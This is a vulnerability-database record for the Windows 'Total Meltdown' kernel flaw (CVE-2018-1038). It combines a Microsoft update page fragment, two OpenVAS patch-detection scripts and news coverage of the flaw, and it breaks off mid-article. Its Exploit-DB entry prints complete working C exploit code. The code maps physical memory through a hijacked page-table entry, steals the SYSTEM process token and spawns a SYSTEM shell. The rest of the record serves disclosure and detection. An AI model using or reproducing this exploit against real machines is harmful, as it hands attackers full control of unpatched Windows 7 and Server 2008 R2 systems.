This occurs because of an issue related to a missing file, oem<number>.inf. The exact problematic configurations are currently unknown.</td><td valign=\"top\"><ol><li>To locate the network device, launch devmgmt.msc; it may appear under <strong>Other Devices</strong>.</li><li>To automatically rediscover the NIC and install drivers, select <strong>Scan for Hardware Changes</strong> from the <strong>Action</strong> menu.</li></ol><p class=\"indent-1\">a. Alternatively, install the drivers for the network device by right-clicking the device and choosing <strong>Update</strong>.<strong> </strong>Then choose <strong>Search automatically for updated driver software</strong>\u00a0or <strong>Browse my computer for driver software</strong>.</p></td></tr></tbody></table><h2>How to get this update</h2><div><p>This update is now available for installation through WSUS. To get the standalone package for this update, go to the\u00a0<a href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4088878\">Microsoft Update Catalog</a>\u00a0website.</p><p><strong>File information</strong></p><p>For a list of the files that are provided in this update, download the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"http://download.microsoft.com/download/2/C/F/2CFE5434-3BAA-41A4-B454-CA9078F0A997/4088878.csv\" target=\"\">file information for update 4088878</a>.\u00a0</p></div></body></html>", "edition": 2, "modified": "2018-09-10T17:07:51", "id": "KB4088878", "href": "https://support.microsoft.com/en-us/help/4088878/", "published": "2018-03-13T00:00:00", "title": "March 13, 2018\u2014KB4088878 (Security-only update)", "type": "mskb", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2018-05-24T14:19:45", "description": "Microsoft Windows - Local Privilege Escalation. CVE-2018-1038. 
Local exploit for Windows platform", "published": "2018-04-24T00:00:00", "type": "exploitdb", "title": "Microsoft Windows - Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-1038"], "modified": "2018-04-24T00:00:00", "id": "EDB-ID:44581", "href": "https://www.exploit-db.com/exploits/44581/", "sourceData": "#include \"stdafx.h\"\r\n\r\n#define\tPML4_BASE\t0xFFFFF6FB7DBED000\r\n#define\tPDP_BASE\t0xFFFFF6FB7DA00000\r\n#define\tPD_BASE\t\t0xFFFFF6FB40000000\r\n#define\tPT_BASE\t0xFFFFF68000000000\r\n\r\ntypedef LARGE_INTEGER PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS;\r\n\r\n#pragma pack(push,4)\r\ntypedef struct _CM_PARTIAL_RESOURCE_DESCRIPTOR {\r\n\tUCHAR Type;\r\n\tUCHAR ShareDisposition;\r\n\tUSHORT Flags;\r\n\tunion {\r\n\t\tstruct {\r\n\t\t\tPHYSICAL_ADDRESS Start;\r\n\t\t\tULONG Length;\r\n\t\t} Generic;\r\n\r\n\t\tstruct {\r\n\t\t\tPHYSICAL_ADDRESS Start;\r\n\t\t\tULONG Length;\r\n\t\t} Port;\r\n\r\n\t\tstruct {\r\n#if defined(NT_PROCESSOR_GROUPS)\r\n\t\t\tUSHORT Level;\r\n\t\t\tUSHORT Group;\r\n#else\r\n\t\t\tULONG Level;\r\n#endif\r\n\t\t\tULONG Vector;\r\n\t\t\tKAFFINITY Affinity;\r\n\t\t} Interrupt;\r\n\r\n\t\tstruct {\r\n\t\t\tunion {\r\n\t\t\t\tstruct {\r\n#if defined(NT_PROCESSOR_GROUPS)\r\n\t\t\t\t\tUSHORT Group;\r\n#else\r\n\t\t\t\t\tUSHORT Reserved;\r\n#endif\r\n\t\t\t\t\tUSHORT MessageCount;\r\n\t\t\t\t\tULONG Vector;\r\n\t\t\t\t\tKAFFINITY Affinity;\r\n\t\t\t\t} Raw;\r\n\r\n\t\t\t\tstruct {\r\n#if defined(NT_PROCESSOR_GROUPS)\r\n\t\t\t\t\tUSHORT Level;\r\n\t\t\t\t\tUSHORT Group;\r\n#else\r\n\t\t\t\t\tULONG Level;\r\n#endif\r\n\t\t\t\t\tULONG Vector;\r\n\t\t\t\t\tKAFFINITY Affinity;\r\n\t\t\t\t} Translated;\r\n\t\t\t} DUMMYUNIONNAME;\r\n\t\t} MessageInterrupt;\r\n\r\n\t\tstruct {\r\n\t\t\tPHYSICAL_ADDRESS Start; \r\n\t\t\tULONG Length;\r\n\t\t} Memory;\r\n\r\n\t\tstruct {\r\n\t\t\tULONG Channel;\r\n\t\t\tULONG Port;\r\n\t\t\tULONG Reserved1;\r\n\t\t} Dma;\r\n\r\n\t\tstruct {\r\n\t\t\tULONG Channel;\r\n\t\t\tULONG 
RequestLine;\r\n\t\t\tUCHAR TransferWidth;\r\n\t\t\tUCHAR Reserved1;\r\n\t\t\tUCHAR Reserved2;\r\n\t\t\tUCHAR Reserved3;\r\n\t\t} DmaV3;\r\n\r\n\t\tstruct {\r\n\t\t\tULONG Data[3];\r\n\t\t} DevicePrivate;\r\n\r\n\t\tstruct {\r\n\t\t\tULONG Start;\r\n\t\t\tULONG Length;\r\n\t\t\tULONG Reserved;\r\n\t\t} BusNumber;\r\n\r\n\t\tstruct {\r\n\t\t\tULONG DataSize;\r\n\t\t\tULONG Reserved1;\r\n\t\t\tULONG Reserved2;\r\n\t\t} DeviceSpecificData;\r\n\r\n\t\tstruct {\r\n\t\t\tPHYSICAL_ADDRESS Start;\r\n\t\t\tULONG Length40;\r\n\t\t} Memory40;\r\n\r\n\t\tstruct {\r\n\t\t\tPHYSICAL_ADDRESS Start;\r\n\t\t\tULONG Length48;\r\n\t\t} Memory48;\r\n\r\n\t\tstruct {\r\n\t\t\tPHYSICAL_ADDRESS Start;\r\n\t\t\tULONG Length64;\r\n\t\t} Memory64;\r\n\r\n\t\tstruct {\r\n\t\t\tUCHAR Class;\r\n\t\t\tUCHAR Type;\r\n\t\t\tUCHAR Reserved1;\r\n\t\t\tUCHAR Reserved2;\r\n\t\t\tULONG IdLowPart;\r\n\t\t\tULONG IdHighPart;\r\n\t\t} Connection;\r\n\r\n\t} u;\r\n} CM_PARTIAL_RESOURCE_DESCRIPTOR, *PCM_PARTIAL_RESOURCE_DESCRIPTOR;\r\n#pragma pack(pop,4)\r\n\r\ntypedef enum _INTERFACE_TYPE {\r\n\tInterfaceTypeUndefined,\r\n\tInternal,\r\n\tIsa,\r\n\tEisa,\r\n\tMicroChannel,\r\n\tTurboChannel,\r\n\tPCIBus,\r\n\tVMEBus,\r\n\tNuBus,\r\n\tPCMCIABus,\r\n\tCBus,\r\n\tMPIBus,\r\n\tMPSABus,\r\n\tProcessorInternal,\r\n\tInternalPowerBus,\r\n\tPNPISABus,\r\n\tPNPBus,\r\n\tVmcs,\r\n\tACPIBus,\r\n\tMaximumInterfaceType\r\n} INTERFACE_TYPE, *PINTERFACE_TYPE;\r\n\r\ntypedef struct _CM_PARTIAL_RESOURCE_LIST {\r\n\tUSHORT Version;\r\n\tUSHORT Revision;\r\n\tULONG Count;\r\n\tCM_PARTIAL_RESOURCE_DESCRIPTOR PartialDescriptors[1];\r\n} CM_PARTIAL_RESOURCE_LIST, *PCM_PARTIAL_RESOURCE_LIST;\r\n\r\ntypedef struct _CM_FULL_RESOURCE_DESCRIPTOR {\r\n\tINTERFACE_TYPE InterfaceType;\r\n\tULONG BusNumber;\r\n\tCM_PARTIAL_RESOURCE_LIST PartialResourceList;\r\n} *PCM_FULL_RESOURCE_DESCRIPTOR, CM_FULL_RESOURCE_DESCRIPTOR;\r\n\r\ntypedef struct _CM_RESOURCE_LIST {\r\n\tULONG Count;\r\n\tCM_FULL_RESOURCE_DESCRIPTOR List[1];\r\n} 
*PCM_RESOURCE_LIST, CM_RESOURCE_LIST;\r\n\r\nstruct memory_region {\r\n\tULONG64 size;\r\n\tULONG64 address;\r\n};\r\n\r\n// Very hack'y way of trying to map out physical memory regions to try and reduce\r\n// risk of BSOD\r\nDWORD parse_memory_map(struct memory_region *regions) {\r\n\tHKEY hKey = NULL;\r\n\tLPTSTR pszSubKey = L\"Hardware\\\\ResourceMap\\\\System Resources\\\\Physical Memory\";\r\n\tLPTSTR pszValueName = L\".Translated\";\r\n\tLPBYTE lpData = NULL;\r\n\tDWORD dwLength = 0, count = 0, type = 0;;\r\n\r\n\tif (!RegOpenKey(HKEY_LOCAL_MACHINE, pszSubKey, &hKey) == ERROR_SUCCESS)\r\n\t{\r\n\t\tprintf(\"[*] Could not get reg key\\n\");\r\n\t\treturn 0;\r\n\t}\r\n\r\n\tif (!RegQueryValueEx(hKey, pszValueName, 0, &type, NULL, &dwLength) == ERROR_SUCCESS)\r\n\t{\r\n\t\tprintf(\"[*] Could not query hardware key\\n\");\r\n\t\treturn 0;\r\n\t}\r\n\r\n\tlpData = (LPBYTE)malloc(dwLength);\r\n\tRegQueryValueEx(hKey, pszValueName, 0, &type, lpData, &dwLength);\r\n\r\n\tCM_RESOURCE_LIST *resource_list = (CM_RESOURCE_LIST *)lpData;\r\n\r\n\tfor (int i = 0; i < resource_list->Count; i++) {\r\n\t\tfor (int j = 0; j < resource_list->List[0].PartialResourceList.Count; j++) {\r\n\t\t\tif (resource_list->List[i].PartialResourceList.PartialDescriptors[j].Type == 3) {\r\n\t\t\t\tregions->address = resource_list->List[i].PartialResourceList.PartialDescriptors[j].u.Memory.Start.QuadPart;\r\n\t\t\t\tregions->size = resource_list->List[i].PartialResourceList.PartialDescriptors[j].u.Memory.Length;\r\n\t\t\t\tregions++;\r\n\t\t\t\tcount++;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\r\n\treturn count;\r\n}\r\n\r\nint main()\r\n{\r\n\tprintf(\"TotalMeltdown PrivEsc exploit by @_xpn_\\n\");\r\n\tprintf(\" paging code by @UlfFrisk\\n\\n\");\r\n\r\n\tunsigned long long iPML4, vaPML4e, vaPDPT, iPDPT, vaPD, iPD;\r\n\tDWORD done;\r\n\tDWORD count;\r\n\r\n\t// Parse registry for physical memory regions\r\n\tprintf(\"[*] Getting physical memory regions from registry\\n\");\r\n\tstruct memory_region 
*regions = (struct memory_region *)malloc(sizeof(struct memory_region) * 10);\r\n\r\n\tcount = parse_memory_map(regions);\r\n\tif (count == 0) {\r\n\t\tprintf(\"[X] Could not find physical memory region, quitting\\n\");\r\n\t\treturn 2;\r\n\t}\r\n\r\n\tfor (int i = 0; i < count; i++) {\r\n\t\tprintf(\"[*] Physical memory region found: %p - %p\\n\", regions[i].address, regions[i].address + regions[i].size);\r\n\t}\r\n\r\n\t// Check for vulnerability\r\n\t__try {\r\n\t\tint test = *(unsigned long long *)PML4_BASE;\r\n\t}\r\n\t__except (EXCEPTION_EXECUTE_HANDLER) {\r\n\t\tprintf(\"[X] Could not access PML4 address, system likely not vulnerable\\n\");\r\n\t\treturn 2;\r\n\t}\r\n\r\n\t// setup: PDPT @ fixed hi-jacked physical address: 0x10000\r\n\t// This code uses the PML4 Self-Reference technique discussed, and iterates until we find a \"free\" PML4 entry\r\n\t// we can hijack.\r\n\tfor (iPML4 = 256; iPML4 < 512; iPML4++) {\r\n\t\tvaPML4e = PML4_BASE + (iPML4 << 3);\r\n\t\tif (*(unsigned long long *)vaPML4e) { continue; }\r\n\r\n\t\t// When we find an entry, we add a pointer to the next table (PDPT), which will be\r\n\t\t// stored at the physical address 0x10000\r\n\t\t*(unsigned long long *)vaPML4e = 0x10067;\r\n\t\tbreak;\r\n\t}\r\n\tprintf(\"[*] PML4 Entry Added At Index: %d\\n\", iPML4);\r\n\r\n\t// Here, the PDPT table is referenced via a virtual address.\r\n\t// For example, if we added our hijacked PML4 entry at index 256, this virtual address\r\n\t// would be 0xFFFFF6FB7DA00000 + 0x100000\r\n\t// This allows us to reference the physical address 0x10000 as:\r\n\t// PML4 Index: 1ed | PDPT Index : 1ed |\tPDE Index : 1ed | PT Index : 100\r\n\tvaPDPT = PDP_BASE + (iPML4 << (9 * 1 + 3));\r\n\tprintf(\"[*] PDPT Virtual Address: %p\", vaPDPT);\r\n\r\n\t// 2: setup 31 PDs @ physical addresses 0x11000-0x1f000 with 2MB pages\r\n\t// Below is responsible for adding 31 entries to the PDPT\r\n\tfor (iPDPT = 0; iPDPT < 31; iPDPT++) {\r\n\t\t*(unsigned long long *)(vaPDPT + 
(iPDPT << 3)) = 0x11067 + (iPDPT << 12);\r\n\t}\r\n\r\n\t// For each of the PDs, a further 512 PT's are created. This gives access to\r\n\t// 512 * 32 * 2mb = 33gb physical memory space\r\n\tfor (iPDPT = 0; iPDPT < 31; iPDPT++) {\r\n\t\tif ((iPDPT % 3) == 0)\r\n\t\t\tprintf(\"\\n[*] PD Virtual Addresses: \");\r\n\r\n\t\tvaPD = PD_BASE + (iPML4 << (9 * 2 + 3)) + (iPDPT << (9 * 1 + 3));\r\n\t\tprintf(\"%p \", vaPD);\r\n\r\n\t\tfor (iPD = 0; iPD < 512; iPD++) {\r\n\t\t\t// Below, notice the 0xe7 flags added to each entry.\r\n\t\t\t// This is used to create a 2mb page rather than the standard 4096 byte page.\r\n\t\t\t*(unsigned long long *)(vaPD + (iPD << 3)) = ((iPDPT * 512 + iPD) << 21) | 0xe7;\r\n\t\t}\r\n\t}\r\n\r\n\tprintf(\"\\n[*] Page tables created, we now have access to ~31gb of physical memory\\n\");\r\n\r\n\t#define EPROCESS_IMAGENAME_OFFSET 0x2e0\r\n\t#define EPROCESS_TOKEN_OFFSET 0x208\r\n\t#define EPROCESS_PRIORITY_OFFSET 0xF // This is the offset from IMAGENAME, not from base\r\n\r\n\tunsigned long long ourEPROCESS = 0, systemEPROCESS = 0;\r\n\tunsigned long long exploitVM = 0xffff000000000000 + (iPML4 << (9 * 4 + 3));\r\n\tSTARTUPINFOA si;\r\n\tPROCESS_INFORMATION pi;\r\n\t\r\n\tZeroMemory(&si, sizeof(si));\r\n\tsi.cb = sizeof(si);\r\n\tZeroMemory(&pi, sizeof(pi));\r\n\r\n\tprintf(\"[*] Hunting for _EPROCESS structures in memory\\n\");\r\n\r\n\tfor (int j = 0; j < count; j++) {\r\n\t\tprintf(\"[*] Trying physical region %p - %p\\n\", regions[j].address, regions[j].address + regions[j].size);\r\n\r\n\t\tfor (unsigned long long i = regions[j].address; i < +regions[j].address + regions[j].size; i++) {\r\n\t\t\t\r\n\t\t\t__try {\r\n\t\t\t\t// Locate EPROCESS via the IMAGE_FILE_NAME field, and PRIORITY_CLASS field\r\n\t\t\t\tif (ourEPROCESS == 0 && memcmp(\"TotalMeltdownP\", (unsigned char *)(exploitVM + i), 14) == 0) {\r\n\t\t\t\t\tif (*(unsigned char *)(exploitVM + i + EPROCESS_PRIORITY_OFFSET) == 0x2) {\r\n\t\t\t\t\t\tourEPROCESS = exploitVM + i - 
EPROCESS_IMAGENAME_OFFSET;\r\n\t\t\t\t\t\tprintf(\"[*] Found our _EPROCESS at %p\\n\", ourEPROCESS);\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\t// Locate EPROCESS via the IMAGE_FILE_NAME field, and PRIORITY_CLASS field\r\n\t\t\t\telse if (systemEPROCESS == 0 && memcmp(\"System\\0\\0\\0\\0\\0\\0\\0\\0\\0\", (unsigned char *)(exploitVM + i), 14) == 0) {\r\n\t\t\t\t\tif (*(unsigned char *)(exploitVM + i + EPROCESS_PRIORITY_OFFSET) == 0x2) {\r\n\t\t\t\t\t\tsystemEPROCESS = exploitVM + i - EPROCESS_IMAGENAME_OFFSET;\r\n\t\t\t\t\t\tprintf(\"[*] Found System _EPROCESS at %p\\n\", systemEPROCESS);\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\r\n\t\t\t\tif (systemEPROCESS != 0 && ourEPROCESS != 0) {\r\n\t\t\t\t\t// Swap the tokens by copying the pointer to System Token field over our process token\r\n\t\t\t\t\tprintf(\"[*] Copying access token from %p to %p\\n\", systemEPROCESS + EPROCESS_TOKEN_OFFSET, ourEPROCESS + EPROCESS_TOKEN_OFFSET);\r\n\t\t\t\t\t*(unsigned long long *)((char *)ourEPROCESS + EPROCESS_TOKEN_OFFSET) = *(unsigned long long *)((char *)systemEPROCESS + EPROCESS_TOKEN_OFFSET);\r\n\t\t\t\t\tprintf(\"[*] Done, spawning SYSTEM shell...\\n\\n\");\r\n\r\n\t\t\t\t\tCreateProcessA(0,\r\n\t\t\t\t\t\t\"cmd.exe\",\r\n\t\t\t\t\t\tNULL,\r\n\t\t\t\t\t\tNULL,\r\n\t\t\t\t\t\tTRUE,\r\n\t\t\t\t\t\t0,\r\n\t\t\t\t\t\tNULL,\r\n\t\t\t\t\t\t\"C:\\\\windows\\\\system32\",\r\n\t\t\t\t\t\t&si,\r\n\t\t\t\t\t\t&pi);\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\t__except (EXCEPTION_EXECUTE_HANDLER) {\r\n\t\t\t\tprintf(\"[X] Exception occurred, stopping to avoid BSOD\\n\");\r\n\t\t\t\treturn 2;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n return 0;\r\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/44581/"}], "openvas": [{"lastseen": "2020-06-08T23:06:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-1038"], "description": "This host is missing a critical security\n update according to Microsoft 
KB4100480", "modified": "2020-06-04T00:00:00", "published": "2018-03-30T00:00:00", "id": "OPENVAS:1361412562310812848", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812848", "type": "openvas", "title": "Microsoft Windows Kernel Elevation of Privilege Vulnerability (KB4100480)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Kernel Elevation of Privilege Vulnerability (KB4100480)\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812848\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-1038\");\n script_bugtraq_id(103549);\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-03-30 13:47:55 +0530 (Fri, 30 Mar 2018)\");\n script_name(\"Microsoft Windows Kernel Elevation of Privilege Vulnerability (KB4100480)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4100480\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to Windows kernel failing\n to properly handle objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in kernel mode which will empower them to install\n programs, view, change, delete data or create new accounts with full user\n rights.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7 for x64-based Systems Service Pack 1\n\n - Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4100480\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"kernel32.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.1.7601.24059\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\kernel32.dll\", file_version:fileVer, vulnerable_range:\"Less than 6.1.7601.24059\");\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:06:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8415", "CVE-2018-1038", "CVE-2018-8550", "CVE-2018-8553", "CVE-2018-8256", "CVE-2018-8562", "CVE-2018-8570", "CVE-2018-8544", "CVE-2018-8471", "CVE-2018-8589", "CVE-2018-8450", "CVE-2018-8476", "CVE-2018-8563", "CVE-2018-8407", "CVE-2018-8408", "CVE-2018-8552", "CVE-2018-8565"], "description": "This host is missing a critical security\n update according to Microsoft KB4467107.", "modified": "2020-06-04T00:00:00", "published": "2018-11-14T00:00:00", "id": "OPENVAS:1361412562310814173", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814173", "type": "openvas", "title": "Microsoft Windows Multiple 
Vulnerabilities (KB4467107)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4467107)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814173\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-8256\", \"CVE-2018-8407\", \"CVE-2018-8408\", \"CVE-2018-8415\",\n \"CVE-2018-8450\", \"CVE-2018-8471\", \"CVE-2018-8476\", \"CVE-2018-8544\",\n \"CVE-2018-8550\", \"CVE-2018-8552\", \"CVE-2018-8553\", \"CVE-2018-8562\",\n \"CVE-2018-8563\", \"CVE-2018-8565\", \"CVE-2018-8570\", \"CVE-2018-8589\",\n \"CVE-2018-1038\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-11-14 15:25:37 +0530 (Wed, 14 Nov 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4467107)\");\n\n 
script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4467107.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists in Windows App\n Platform and Frameworks, Windows Graphics, Windows Wireless Networking,\n Windows Kernel, and Windows Server.\n\n Please see the references for more details.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in kernel mode which will empower them to install\n programs, view, change, delete data or create new accounts with full user rights.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7 for 32-bit/x64 Systems Service Pack 1\n\n - Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4467107\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Advapi32.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, 
test_version:\"6.1.7601.24291\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Advapi32.dll\",\n file_version:fileVer, vulnerable_range:\"Less than 6.1.7601.24291\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2019-04-25T05:50:28", "bulletinFamily": "info", "cvelist": ["CVE-2018-1038"], "description": "Microsoft released an out-of-band fix on Thursday for a Windows vulnerability introduced earlier this year as a patch. If exploited, the bug could allow an authenticated attacker to install programs, access stored data or create new accounts with full user rights on Windows 7 and Server 2008 R2 machines. No other Windows OS version is impacted.\n\nThe bad patch was delivered via Microsoft\u2019s [January Patch Tuesday update](<https://threatpost.com/microsoft-january-patch-tuesday-update-fixes-16-critical-bugs/129378/>). The fix was meant to protect Windows\u2019 system from memory vulnerabilities associated with Intel\u2019s [CPU bug Meltdown](<https://threatpost.com/intel-patches-cpu-bugs-impacting-millions-of-pcs-servers/128962/>).\n\nResearcher Ulf Frisk, credited for first identifying the flaw, said Microsoft\u2019s botched patch \u201cstopped Meltdown but opened up a vulnerability way worse \u2026 It allowed any process to read the complete memory contents at gigabytes per second, oh \u2013 it was possible to write to arbitrary memory as well.\u201d\n\nAs part of his research, Frisk created a proof-of-concept exploiting the bug, publishing his findings in [a technical break down](<http://blog.frizk.net/2018/03/total-meltdown.html?m=1>).\n\n\u201cWe released a security update for Windows 7 Service Pack 1 (x64) and Windows Server 2008 R2 Service Pack 1 (x64). 
Customers who apply the updates, or have automatic updates enabled, are protected,\u201d Microsoft said in a statement Thursday.\n\nMicrosoft said the bug ([CVE-2018-1038](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1038>)) is a Windows kernel elevation of privilege vulnerability. It said:\n\n> \u201cAn elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\u201d\n\nIn order for an attacker to exploit this vulnerability they would first have to log on to the targeted PC and then run a \u201cspecially crafted\u201d application to hijack the system, according to Microsoft. \u201cThe update addresses the vulnerability by correcting how the Windows kernel handles objects in memory,\u201d the [advisory states](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1038>).\n\nFrisk had originally stated Microsoft\u2019s March Patch Tuesday update corrected the issue. On Thursday, Frisk now says Microsoft\u2019s [March Patch Tuesday update](<https://threatpost.com/microsoft-patches-15-critical-bugs-in-march-patch-tuesday-update/130424/>) did not fix the vulnerability. 
Frisk has made his proof-of-concept available via a PCILeech direct memory access attack toolkit,[ hosted on GitHub](<https://github.com/ufrisk/pcileech>).\n", "modified": "2018-03-30T18:51:48", "published": "2018-03-30T18:51:48", "id": "THREATPOST:F3ECBE2B14E2562BC2FD58AD4ABA5BC1", "href": "https://threatpost.com/microsoft-fixes-bad-patch-that-left-windows-7-server-2008-open-to-attack/130871/", "type": "threatpost", "title": "Microsoft Fixes Bad Patch That Left Win7, Server 2008 Open to Attack", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-04-25T05:50:16", "bulletinFamily": "info", "cvelist": ["CVE-2018-1004", "CVE-2018-1010", "CVE-2018-1012", "CVE-2018-1013", "CVE-2018-1015", "CVE-2018-1016", "CVE-2018-1034", "CVE-2018-1038", "CVE-2018-8117"], "description": "Microsoft\u2019s April Patch Tuesday release includes fixes for 66 bugs, 24 of which are rated critical. Notable is Microsoft\u2019s disclosure of a publicly known SharePoint elevation of privilege bug ([CVE-2018-1034](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1034>)), rated important, which has no fix but has not been publicly exploited.\n\nMicrosoft SharePoint Enterprise Server 2016 is the only version impacted by the vulnerability, according to Microsoft. \u201cAn elevation of privilege vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server. An authenticated attacker could exploit the vulnerability by sending a specially crafted request to an affected SharePoint server,\u201d Microsoft said.\n\n\u201cA public disclosure means that a vulnerability was discovered and enough detail about the vulnerability or concept code has been released to give attackers a jump start. It does not mean it has been used in the wild. Public disclosures are an indicator of risk. 
